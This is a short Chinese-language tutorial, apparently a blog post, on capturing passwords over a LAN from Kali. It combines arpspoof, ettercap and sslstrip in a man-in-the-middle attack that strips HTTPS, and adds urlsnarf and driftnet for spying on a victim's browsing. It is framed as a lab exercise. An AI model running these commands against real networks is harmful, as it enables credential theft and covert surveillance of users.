如果用arpspoof配合ettercap只能獲得http協議下的相關賬號密碼。但是,現在普遍https協議,那么這種方法就GG了。
首先,由于默認的ettercap只能嗅探http協議下的密碼,所以,若進行https協議下的嗅探,那么,就要對ettercap配置文件做一些修改。
路徑:
/etc/ettercap/etter.conf
去掉注釋,讓命令生效就可以了。同時保存退出。
然后,用arpspoof配合ettercap以及sslstrip就可以獲得https下的密碼。
補充:sslstrip是一款可以將https還原成http的工具。
命令:
arpspoof -t 192.168.1.130 192.168.1.1 -i eth0 ? ? ? ?進行欺騙
ettercap -Tq -i eth0 ? ? ? ?進行嗅探
sslstrip -a -f -k
注意:并不是每次都能成功抓到用戶名密碼,同時,推薦給kali裝一個usb外置網卡,否則,在做實驗的時候總會遇到各種坑!這些坑是新手不容易跨過的!因為虛擬機畢竟只是虛擬機!同時,防火墻、殺毒軟件是否也會影響實驗效果?有待考量。
最后,補充一下kali中幾個和本次實驗相關的工具,以及使用方法:
urlsnarf -i eth0
在成功的ARP欺騙后,可以利用這個命令抓取流量,看目標瀏覽了哪些網頁。
driftnet -i eth0
同理,在arp欺騙成功后,可以從網卡中抓取目標瀏覽的圖片,但是只能是圖片,而且還有一個缺陷,那就是不是所有的圖片都能抓到。